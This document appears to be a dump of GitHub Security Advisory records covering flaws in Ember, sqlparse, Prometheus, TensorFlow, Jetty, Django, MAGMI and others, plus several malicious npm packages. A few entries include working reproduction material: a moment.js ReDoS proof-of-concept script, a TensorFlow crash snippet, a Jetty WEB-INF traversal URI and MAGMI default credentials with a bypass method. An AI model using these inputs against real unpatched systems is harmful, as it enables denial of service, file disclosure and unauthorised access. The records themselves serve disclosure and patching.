GHSA | GHSA-4q53-fqhc-cr46 | Low severity vulnerability that affects ember-source | Cross-site scripting (XSS) vulnerability in the link-to helper in Ember.js 1.2.x before 1.2.2, 1.3.x before 1.3.2, and 1.4.x before 1.4.0-beta.6, when used in non-block form, allows remote attackers to inject arbitrary web script or HTML via the title attribute. | {'CVE-2014-0046'} | 2021-09-01T17:43:59Z | 2018-08-28T22:33:42Z | LOW | 0 | {'CWE-79'} | {'https://exchange.xforce.ibmcloud.com/vulnerabilities/91242', 'http://emberjs.com/blog/2014/02/07/ember-security-releases.html', 'https://github.com/advisories/GHSA-4q53-fqhc-cr46', 'https://nvd.nist.gov/vuln/detail/CVE-2014-0046', 'http://secunia.com/advisories/56965', 'http://www.openwall.com/lists/oss-security/2014/02/14/6', 'http://www.securityfocus.com/bid/65579', 'https://groups.google.com/forum/#!topic/ember-security/1h6FRgr8lXQ'} | null |
GHSA | GHSA-p5w8-wqhj-9hhf | StripComments filter contains a regular expression that is vulnerable to ReDOS (Regular Expression Denial of Service) | ### Impact
The formatter function that strips comments from a SQL contains a regular expression that is vulnerable to [ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) (Regular Expression Denial of Service). The regular expression may cause exponential backtracking on strings containing many repetitions of '\r\n' in SQL comments.
### Patches
The issues has been fixed in sqlparse 0.4.2.
### Workarounds
Only the formatting feature that removes comments from SQL statements is affected by this regular expression. As a workaround don't use the `sqlformat.format` function with keyword `strip_comments=True` or the `--strip-comments` command line flag when using the `sqlformat` command line tool.
### References
This issue was discovered by GitHub team members @erik-krogh and @yoff. It was found using a [CodeQL](https://codeql.github.com/) query which identifies inefficient regular expressions. You can see the results of the query on python-sqlparse by following [this link](https://lgtm.com/query/2223658096471222354/).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [sqlparse issue tracker](https://github.com/andialbrecht/sqlparse/issues)
* Email us at [albrecht.andi@gmail.com](mailto:albrecht.andi@gmail.com)
| {'CVE-2021-32839'} | 2022-04-19T19:03:08Z | 2021-09-10T17:56:06Z | HIGH | 7.5 | {'CWE-400'} | {'https://github.com/andialbrecht/sqlparse/commit/8238a9e450ed1524e40cb3a8b0b3c00606903aeb', 'https://securitylab.github.com/advisories/GHSL-2021-107-andialbrecht-sqlparse/', 'https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-p5w8-wqhj-9hhf', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32839', 'https://github.com/advisories/GHSA-p5w8-wqhj-9hhf'} | null |
GHSA | GHSA-6m6m-j2hm-pxrg | Malicious Package in cicada-render | All versions of `cicada-render` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-09-30T19:33:37Z | 2020-09-03T17:37:05Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://www.npmjs.com/advisories/1051', 'https://github.com/advisories/GHSA-6m6m-j2hm-pxrg'} | null |
GHSA | GHSA-7j36-gc4r-9x3r | Out of bounds access in compact_arena | An issue was discovered in the compact_arena crate before 0.4.0 for Rust. Generativity is mishandled, leading to an out-of-bounds write or read. | {'CVE-2019-16139'} | 2021-08-25T20:44:48Z | 2021-08-25T20:44:48Z | CRITICAL | 9.8 | {'CWE-787', 'CWE-125'} | {'https://github.com/advisories/GHSA-7j36-gc4r-9x3r', 'https://rustsec.org/advisories/RUSTSEC-2019-0015.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16139', 'https://github.com/llogiq/compact_arena/issues/22'} | null |
GHSA | GHSA-vx57-7f4q-fpc7 | Arbitrary redirects under /new endpoint | ### Impact
In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /.
Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
If a user visits a prometheus server with a specially crafted address (e.g.: `http://127.0.0.1:9090/new/new<url>`), they can be redirected to an arbitrary URL.
e.g. if a user visits http://127.0.0.1:9090/new/newhttp://www.google.com/, they will be redirected to http://google.com.
### Patches
The issue will be patched in 2.26.1 and 2.27.1 releases.
In 2.28.0, the /new endpoint will be removed completely.
### Workarounds
The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
Note: Users who use a `--web.external-url=` flag _with a path_ (e.g. `--web.external-url=http://example.com/prometheus`) are not affected.
### For more information
If you have any questions or comments about this advisory, please use our community channels (https://prometheus.io/community).
Our security policy is available at https://prometheus.io/docs/operating/security/
| {'CVE-2021-29622'} | 2022-04-19T19:02:57Z | 2022-02-15T01:57:18Z | MODERATE | 6.1 | {'CWE-601'} | {'https://github.com/prometheus/prometheus/releases/tag/v2.26.1', 'https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7', 'https://github.com/advisories/GHSA-vx57-7f4q-fpc7', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29622', 'https://github.com/prometheus/prometheus/releases/tag/v2.27.1'} | null |
GHSA | GHSA-qfjv-998w-q48f | High severity vulnerability that affects org.apache.syncope:syncope-core | An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution. | {'CVE-2018-17186'} | 2021-09-16T19:56:57Z | 2018-11-06T23:15:46Z | HIGH | 7.2 | {'CWE-611'} | {'https://github.com/advisories/GHSA-qfjv-998w-q48f', 'https://syncope.apache.org/security#CVE-2018-17186:_XXE_on_BPMN_definitions', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17186'} | null |
GHSA | GHSA-qm4q-f956-fg64 | Malicious Package in luna-mock | All versions of `luna-mock` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it. | null | 2021-09-30T19:50:02Z | 2020-09-03T17:39:13Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://www.npmjs.com/advisories/1055', 'https://github.com/advisories/GHSA-qm4q-f956-fg64'} | null |
GHSA | GHSA-686h-j8r8-wmfm | Data races in rcu_cell | Affected versions of this crate unconditionally implement Send/Sync for `RcuCell<T>`.
This allows users to send `T: !Send` to other threads (while `T` enclosed within `RcuCell<T>`), and allows users to concurrently access `T: !Sync` by using the APIs of `RcuCell<T>` that provide access to `&T`.
This can result in memory corruption caused by data races. | {'CVE-2020-36451'} | 2021-08-25T20:57:14Z | 2021-08-25T20:57:14Z | HIGH | 8.1 | {'CWE-362', 'CWE-77'} | {'https://github.com/advisories/GHSA-686h-j8r8-wmfm', 'https://github.com/Xudong-Huang/rcu_cell/pull/4', 'https://github.com/Xudong-Huang/rcu_cell/issues/3', 'https://github.com/Xudong-Huang/rcu_cell/pull/4/commits/1faf18eee11f14969b77ae0f76dcd9ebd437d0c2', 'https://rustsec.org/advisories/RUSTSEC-2020-0131.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36451'} | null |
GHSA | GHSA-cqff-fx2x-p86v | Improper Authentication | ### Impact
A maliciously crafted claim may be incorrectly authenticated by the bot. Impacts bots that are not configured to be used as a Skill. This vulnerability requires an attacker to have internal knowledge of the bot.
### Patches
The problem has been patched in all affected versions. Please see the list of patched versions for the most appropiate one for your individual case.
### Workarounds
Users who do not wish or are not able to upgrade can add an authentication configuration containing ClaimsValidator, which throws an exception if Claims are Skill Claims.
For detailed instructions, see the link in the References section.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Microsoft Bot Builder SDK](https://github.com/microsoft/botframework-sdk)
* Email us at [bf-reports@microsoft.com](mailto:bf-reports@microsoft.com) | null | 2021-03-08T15:50:10Z | 2021-03-08T15:50:10Z | HIGH | 0 | {'CWE-287'} | {'https://github.com/microsoft/botbuilder-python/security/advisories/GHSA-cqff-fx2x-p86v', 'https://github.com/advisories/GHSA-cqff-fx2x-p86v', 'https://pypi.org/project/botframework-connector/', 'https://github.com/microsoft/botbuilder-python/blob/main/doc/SkillClaimsValidation.md'} | null |
GHSA | GHSA-93wh-35r4-6qmw | Exposure of Sensitive Information to an Unauthorized Actor in moodle | It was possible for some users without permission to view other users' full names to do so via the online users block in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17. | {'CVE-2021-20281'} | 2021-03-29T20:43:23Z | 2021-03-29T20:43:23Z | MODERATE | 5.3 | {'CWE-200'} | {'https://bugzilla.redhat.com/show_bug.cgi?id=1939041', 'https://github.com/advisories/GHSA-93wh-35r4-6qmw', 'https://github.com/moodle/moodle/commit/33d6017287e1835513a3de8edd3fbf7a6a90af9c', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20281', 'https://moodle.org/mod/forum/discuss.php?d=419652', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'} | null |
GHSA | GHSA-2x75-mf24-588m | Out-of-bounds write | A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1103, CVE-2019-1106, CVE-2019-1107. | {'CVE-2019-1092'} | 2021-03-29T20:59:11Z | 2021-03-29T20:59:11Z | HIGH | 7.5 | {'CWE-787'} | {'https://github.com/chakra-core/ChakraCore/commit/d4e767fb946128c135d77edda7a794561e1c1f06', 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1092', 'https://nvd.nist.gov/vuln/detail/CVE-2019-1092', 'https://github.com/advisories/GHSA-2x75-mf24-588m'} | null |
GHSA | GHSA-3rpr-mg43-xhq4 | High severity vulnerability that affects auth0-js | A cross-origin vulnerability has been discovered in the Auth0 auth0.js library affecting versions < 8.12. This vulnerability allows an attacker to acquire authenticated users' tokens and invoke services on a user's behalf if the target site or application uses a popup callback page with auth0.popup.callback(). | {'CVE-2017-17068'} | 2021-08-31T21:24:03Z | 2017-12-21T00:47:20Z | HIGH | 7.5 | {'CWE-200'} | {'https://auth0.com/docs/security/bulletins/cve-2017-17068', 'https://nvd.nist.gov/vuln/detail/CVE-2017-17068', 'https://github.com/advisories/GHSA-3rpr-mg43-xhq4', 'https://appcheck-ng.com/appcheck-discovers-vulnerability-auth0-library-cve-2017-17068/'} | null |
GHSA | GHSA-j667-c2hm-f2wp | Insertion of Sensitive Information into Log File and Improper Output Neutralization for Logs in ansible | A flaw was found in the Ansible Engine when using module_args. Tasks executed with check mode (--check-mode) do not properly neutralize sensitive data exposed in the event data. This flaw allows unauthorized users to read this data. The highest threat from this vulnerability is to confidentiality. | {'CVE-2020-14332'} | 2022-04-07T15:10:52Z | 2022-02-09T21:59:39Z | MODERATE | 5.5 | {'CWE-117', 'CWE-532'} | {'https://www.debian.org/security/2021/dsa-4950', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14332', 'https://nvd.nist.gov/vuln/detail/CVE-2020-14332', 'https://github.com/advisories/GHSA-j667-c2hm-f2wp', 'https://github.com/ansible/ansible/pull/71033'} | null |
GHSA | GHSA-6mx3-3vqg-hpp2 | Django allows unprivileged users can read the password hashes of arbitrary accounts | An issue was discovered in Django 2.1 before 2.1.2, in which unprivileged users can read the password hashes of arbitrary accounts. The read-only password widget used by the Django Admin to display an obfuscated password hash was bypassed if a user has only the "view" permission (new in Django 2.1), resulting in display of the entire password hash to those users. This may result in a vulnerability for sites with legacy user accounts using insecure hashes. | {'CVE-2018-16984'} | 2022-04-26T18:34:52Z | 2018-10-03T20:07:39Z | MODERATE | 4.9 | {'CWE-522'} | {'https://nvd.nist.gov/vuln/detail/CVE-2018-16984', 'https://github.com/advisories/GHSA-6mx3-3vqg-hpp2', 'https://security.netapp.com/advisory/ntap-20190502-0009/', 'http://www.securitytracker.com/id/1041749', 'https://www.djangoproject.com/weblog/2018/oct/01/security-release/'} | null |
GHSA | GHSA-g6v7-vqhx-6v6c | XML External Entity Reference in org.opencms:opencms-core | An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document. | {'CVE-2021-3312'} | 2021-10-18T18:40:16Z | 2021-10-12T17:23:40Z | MODERATE | 6.5 | {'CWE-611'} | {'https://github.com/alkacon/opencms-core/issues/725', 'https://github.com/advisories/GHSA-g6v7-vqhx-6v6c', 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee', 'https://github.com/alkacon/opencms-core/releases', 'https://github.com/alkacon/opencms-core/issues/721', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312'} | null |
GHSA | GHSA-87vv-r9j6-g5qv | Regular Expression Denial of Service in moment | Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`.
## Proof of concept
```
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
```
### Results
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
## Recommendation
Please update to version 2.11.2 or later. | {'CVE-2016-4055'} | 2021-09-07T14:33:56Z | 2017-10-24T18:33:35Z | MODERATE | 6.5 | {'CWE-400'} | {'https://nodesecurity.io/advisories/55', 'http://www.securityfocus.com/bid/95849', 'https://github.com/advisories/GHSA-87vv-r9j6-g5qv', 'https://www.tenable.com/security/tns-2019-02', 'https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E', 'https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://www.npmjs.com/advisories/55', 'https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2016/04/20/11', 'https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4055'} | null |
GHSA | GHSA-j257-jfvv-h3x5 | Privilege Escalation in Channelmgnt plug-in for Sopel | ### Impact
Malicious users are able to op/voice and take over a channel
### Patches
On version 1.0.3
### Workarounds
Disable channelmgnt
### References
https://phab.bots.miraheze.wiki/T117
### For more information
If you have any questions or comments about this advisory:
* Email us at [staff(at)mirahezebots(dot)org](mailto:staff@mirahezebots.org) | {'CVE-2020-15251'} | 2022-04-19T19:02:38Z | 2020-10-13T17:30:30Z | HIGH | 7.7 | {'CWE-862', 'CWE-863'} | {'https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-j257-jfvv-h3x5', 'https://phab.bots.miraheze.wiki/T117', 'https://github.com/MirahezeBots/MirahezeBots/security/advisories/GHSA-23pc-4339-95vg', 'https://phab.bots.miraheze.wiki/phame/live/1/post/1/summary/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15251', 'https://github.com/advisories/GHSA-j257-jfvv-h3x5', 'https://pypi.org/project/sopel-plugins.channelmgnt/', 'https://github.com/MirahezeBots/sopel-channelmgnt/pull/3'} | null |
GHSA | GHSA-cgfm-62j4-v4rf | Heap out of bounds access in sparse reduction operations | ### Impact
The implementation of sparse reduction operations in TensorFlow can trigger accesses outside of bounds of heap allocated data:
```python
import tensorflow as tf
x = tf.SparseTensor(
indices=[[773, 773, 773], [773, 773, 773]],
values=[1, 1],
dense_shape=[337, 337, 337])
tf.sparse.reduce_sum(x, 1)
```
The [implementation](https://github.com/tensorflow/tensorflow/blob/a1bc56203f21a5a4995311825ffaba7a670d7747/tensorflow/core/kernels/sparse_reduce_op.cc#L217-L228) fails to validate that each reduction group does not overflow and that each corresponding index does not point to outside the bounds of the input tensor.
### Patches
We have patched the issue in GitHub commit [87158f43f05f2720a374f3e6d22a7aaa3a33f750](https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750).
The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-37635'} | 2021-08-25T14:44:17Z | 2021-08-25T14:44:17Z | HIGH | 7.3 | {'CWE-125'} | {'https://github.com/tensorflow/tensorflow/commit/87158f43f05f2720a374f3e6d22a7aaa3a33f750', 'https://github.com/advisories/GHSA-cgfm-62j4-v4rf', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cgfm-62j4-v4rf', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37635'} | null |
GHSA | GHSA-g475-pch5-6wvv | Authentication bypass in MAGMI | MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. A remote attacker can trigger this connection failure if the Mysql setting max_connections (default 151) is lower than Apache (or another web server) setting MaxRequestWorkers (formerly MaxClients) (default 256). This can be done by sending at least 151 simultaneous requests to the Magento website to trigger a "Too many connections" error, then use default magmi:magmi basic authentication to remotely bypass authentication. | {'CVE-2020-5777'} | 2021-05-06T18:54:35Z | 2021-05-06T18:54:35Z | CRITICAL | 9.8 | {'CWE-287'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-5777', 'https://github.com/dweeves/magmi-git/commit/dde71de5cfd505fe78e5caf21d6531b61450a16f', 'https://www.tenable.com/security/research/tra-2020-51', 'https://github.com/advisories/GHSA-g475-pch5-6wvv'} | null |
GHSA | GHSA-4g9f-63rx-5cw4 | Segfault in Tensorflow | ### Impact
The [`tf.raw_ops.Switch`](https://www.tensorflow.org/api_docs/python/tf/raw_ops/Switch) operation takes as input a tensor and a boolean and outputs two tensors. Depending on the boolean value, one of the tensors is exactly the input tensor whereas the other one should be an empty tensor.
However, the eager runtime traverses all tensors in the output:
https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/common_runtime/eager/kernel_and_device.cc#L308-L313
Since only one of the tensors is defined, the other one is `nullptr`, hence we are binding a reference to `nullptr`. This is undefined behavior and reported as an error if compiling with `-fsanitize=null`. In this case, this results in a segmentation fault
### Patches
We have patched the issue in da8558533d925694483d2c136a9220d6d49d843c and will release a patch release for all affected versions.
We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2020-15190'} | 2021-08-26T15:09:20Z | 2020-09-25T18:28:14Z | MODERATE | 5.3 | {'CWE-20', 'CWE-476'} | {'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15190', 'https://github.com/advisories/GHSA-4g9f-63rx-5cw4', 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1', 'https://github.com/tensorflow/tensorflow/commit/da8558533d925694483d2c136a9220d6d49d843c', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4g9f-63rx-5cw4'} | null |
GHSA | GHSA-f6p7-8xfw-fjqq | Authenticated Stored XSS in Administration | ### Impact
Authenticated Stored XSS in Administration
### Patches
We recommend updating to the current version 5.6.10. You can get the update to 5.6.10 regularly via the Auto-Updater or directly via the download overview.
For older versions you can use the Security Plugin:
https://store.shopware.com/en/swag575294366635f/shopware-security-plugin.html
### References
https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021 | null | 2021-05-21T14:29:26Z | 2021-05-21T14:29:26Z | MODERATE | 0 | {'CWE-79'} | {'https://docs.shopware.com/en/shopware-5-en/security-updates/security-update-05-2021', 'https://github.com/shopware/shopware/security/advisories/GHSA-f6p7-8xfw-fjqq', 'https://github.com/advisories/GHSA-f6p7-8xfw-fjqq'} | null |
GHSA | GHSA-6cc6-66f5-mxjj | Out-of-bounds write in ChakraCore | A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848. | {'CVE-2020-0826'} | 2021-07-28T18:58:03Z | 2021-07-28T18:58:03Z | HIGH | 7.5 | {'CWE-787'} | {'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0826', 'https://github.com/advisories/GHSA-6cc6-66f5-mxjj', 'https://nvd.nist.gov/vuln/detail/CVE-2020-0826'} | null |
GHSA | GHSA-8cvr-4rrf-f244 | Infinite open connection causes OctoRPKI to hang forever | OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive.
## Patches
## For more information
If you have any questions or comments about this advisory email us at security@cloudflare.com
| {'CVE-2021-3909'} | 2022-01-13T18:25:36Z | 2021-11-10T20:15:44Z | MODERATE | 4.4 | {'CWE-400'} | {'https://github.com/advisories/GHSA-8cvr-4rrf-f244', 'https://www.debian.org/security/2022/dsa-5041', 'https://www.debian.org/security/2021/dsa-5033', 'https://github.com/cloudflare/cfrpki/security/advisories/GHSA-8cvr-4rrf-f244', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3909', 'https://github.com/cloudflare/cfrpki/releases/tag/v1.4.0'} | null |
GHSA | GHSA-5rm3-qhxf-rh3r | Downloads Resources over HTTP in co-cli-installer | Affected versions of `co-cli-installer` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `co-cli-installer`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees. | {'CVE-2016-10657'} | 2021-01-08T19:48:26Z | 2019-02-18T23:45:10Z | HIGH | 0 | {'CWE-311'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-10657', 'https://github.com/advisories/GHSA-5rm3-qhxf-rh3r', 'https://www.npmjs.com/advisories/268', 'https://nodesecurity.io/advisories/268'} | null |
GHSA | GHSA-w24h-v9qh-8gxj | SQL Injection in Django | A SQL injection issue was discovered in QuerySet.explain() in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. This occurs by passing a crafted dictionary (with dictionary expansion) as the **options argument, and placing the injection payload in an option name. | {'CVE-2022-28347'} | 2022-04-22T23:29:02Z | 2022-04-13T00:00:33Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://www.djangoproject.com/weblog/2022/apr/11/security-releases/', 'https://github.com/django/django/commit/6723a26e59b0b5429a0c5873941e01a2e1bdbb81', 'http://www.openwall.com/lists/oss-security/2022/04/11/1', 'https://docs.djangoproject.com/en/4.0/releases/security/', 'https://nvd.nist.gov/vuln/detail/CVE-2022-28347', 'https://github.com/advisories/GHSA-w24h-v9qh-8gxj', 'https://groups.google.com/forum/#!forum/django-announce'} | null |
GHSA | GHSA-gwcr-j4wh-j3cq | Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability | Requests to the `ConcatServlet` and `WelcomeFilter` are able to access protected resources within the `WEB-INF` directory. For example a request to the `ConcatServlet` with a URI of `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.
This occurs because both `ConcatServlet` and `WelcomeFilter` decode the supplied path to verify it is not within the `WEB-INF` or `META-INF` directories. It then uses this decoded path to call `RequestDispatcher` which will also do decoding of the path. This double decoding allows paths with a doubly encoded `WEB-INF` to bypass this security check.
### Impact
This affects all versions of `ConcatServlet` and `WelcomeFilter` in versions before 9.4.41, 10.0.3 and 11.0.3.
### Workarounds
If you cannot update to the latest version of Jetty, you can instead deploy your own version of the [`ConcatServlet`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/ConcatServlet.java) and/or the [`WelcomeFilter`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/WelcomeFilter.java) by using the code from the latest version of Jetty.
| {'CVE-2021-28169'} | 2022-04-22T15:46:37Z | 2021-06-10T15:43:22Z | MODERATE | 5.3 | {'CWE-200'} | {'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.debian.org/security/2021/dsa-4949', 'https://lists.apache.org/thread.html/r284de9c5399486dfff12ab9e7323ca720dd7019a9a3e11c8510a7140@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq', 'https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E', 'https://github.com/advisories/GHSA-gwcr-j4wh-j3cq', 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210727-0009/', 'https://lists.apache.org/thread.html/r91e34ff61aff8fd25a3f2a21539597c6ef7589a31c199b0a9546477c@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r29678972c3f8164b151fd7a5802785d402e530c09870a82ffc7681a4@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd5b52362f5edf98e0dcab6541a381f571cccc05ad9188e793af688f3@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28169', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00017.html', 'https://lists.apache.org/thread.html/rb1292d30462b9baedea7c5d9594fc75990d9aa0ec223b48054ca9c25@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r234f6452297065636356f43654cdacef565b8f9ceb0e0c07ffb8c73b@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E'} | null |
